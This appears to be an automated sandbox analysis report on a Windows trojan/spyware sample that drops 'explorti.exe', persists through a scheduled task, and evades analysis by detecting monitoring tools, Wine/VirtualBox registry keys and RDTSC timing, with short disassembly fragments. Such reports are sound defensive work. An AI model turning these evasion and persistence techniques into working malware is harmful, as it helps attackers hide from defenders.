                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/3@0/1
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6bJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 47%
                      Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                      Source: file.exeStatic file information: File size 1899008 > 1048576
                      Source: file.exeStatic PE information: Raw size of vmjyxrbh is bigger than: 0x100000 < 0x19e200

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 1.2.explorti.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 2.2.explorti.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 7.2.explorti.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 9.2.explorti.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeUnpacked PE file: 10.2.explorti.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vmjyxrbh:EW;bxjwqywv:EW;.taggant:EW;
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: explorti.exe.0.drStatic PE information: real checksum: 0x1de784 should be: 0x1d8d15
                      Source: file.exeStatic PE information: real checksum: 0x1de784 should be: 0x1d8d15
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: vmjyxrbh
                      Source: file.exeStatic PE information: section name: bxjwqywv
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: explorti.exe.0.drStatic PE information: section name:
                      Source: explorti.exe.0.drStatic PE information: section name: .idata
                      Source: explorti.exe.0.drStatic PE information: section name:
                      Source: explorti.exe.0.drStatic PE information: section name: vmjyxrbh
                      Source: explorti.exe.0.drStatic PE information: section name: bxjwqywv
                      Source: explorti.exe.0.drStatic PE information: section name: .taggant
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0018D82C push ecx; ret 1_2_0018D83F
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001DF223 push edi; mov dword ptr [esp], ecx2_1_001DF236
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001DF223 push 4574302Fh; mov dword ptr [esp], edx2_1_001DF25A
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001DF223 push 312AAA77h; mov dword ptr [esp], eax2_1_001DF265
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001DF223 push esi; mov dword ptr [esp], edi2_1_001DF269
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001DEEEF push edx; mov dword ptr [esp], 16ADE0F1h2_1_001DF3CD
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001F8C2B push esi; mov dword ptr [esp], edi2_1_001F8D00
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001F8C2B push edx; mov dword ptr [esp], 7FFB5DFCh2_1_001F8DA5
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_001F8C2B push ebp; mov dword ptr [esp], esp2_1_001F8DCE
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_0021C477 push eax; mov dword ptr [esp], ebp2_1_0021C4A4
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push edi; mov dword ptr [esp], ebp2_1_00285CCE
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push esi; mov dword ptr [esp], 4C1D94A3h2_1_00285D3D
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push 6C097692h; mov dword ptr [esp], ecx2_1_00285D5B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push esi; mov dword ptr [esp], edi2_1_00285E27
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push ebp; mov dword ptr [esp], 2BF908B7h2_1_00285EE3
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00285CAD push edi; mov dword ptr [esp], 1D2358D7h2_1_00285F1F
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002954A1 push 6134CD39h; mov dword ptr [esp], esi2_1_00295585
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002954A1 push 324AC0C8h; mov dword ptr [esp], eax2_1_002955EE
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002954A1 push edx; mov dword ptr [esp], eax2_1_0029571C
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D push 15EF5816h; mov dword ptr [esp], ecx2_1_00251ABC
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D push eax; mov dword ptr [esp], ecx2_1_00251B5A
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D push esi; mov dword ptr [esp], 00000000h2_1_00251B5E
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D push esi; mov dword ptr [esp], ebp2_1_00251B7C
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_00251A8D push 42F2B272h; mov dword ptr [esp], edx2_1_00251BD1
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002068E9 push 160DDC00h; mov dword ptr [esp], ebx2_1_00206972
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002068E9 push 3866C20Bh; mov dword ptr [esp], edi2_1_00206987
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002206C8 push 14E4BE27h; mov dword ptr [esp], ebp2_1_002206E0
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002206C8 push edi; mov dword ptr [esp], esp2_1_002206E4
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002206C8 push ebx; mov dword ptr [esp], edx2_1_00220724
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002206C8 push esi; mov dword ptr [esp], edx2_1_00220767
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 2_1_002206C8 push 43EB4F3Bh; mov dword ptr [esp], ecx2_1_002207A3
                      Source: file.exeStatic PE information: section name: entropy: 7.984526344649267
                      Source: file.exeStatic PE information: section name: vmjyxrbh entropy: 7.955242313605146
                      Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.984526344649267
                      Source: explorti.exe.0.drStatic PE information: section name: vmjyxrbh entropy: 7.955242313605146
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJump to dropped file

                      Boot Survival

                      barindex
                      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECBF second address: B1ECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECC4 second address: B1ECE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jc 00007F7981407BECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86539 second address: C8653F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8653F second address: C86543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86543 second address: C86552 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7980D061B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86552 second address: C8655A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9641B second address: C9644E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F7980D061B6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F7980D061D4h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9644E second address: C96453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96453 second address: C9645B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98DA5 second address: C98DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F7981407BE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98DAF second address: C98DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jne 00007F7980D061B6h 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98DC4 second address: C98E0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F7981407BF5h 0x0000000e push 00000000h 0x00000010 call 00007F7981407BEBh 0x00000015 jmp 00007F7981407BF3h 0x0000001a pop edx 0x0000001b push 0CEF214Eh 0x00000020 push ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
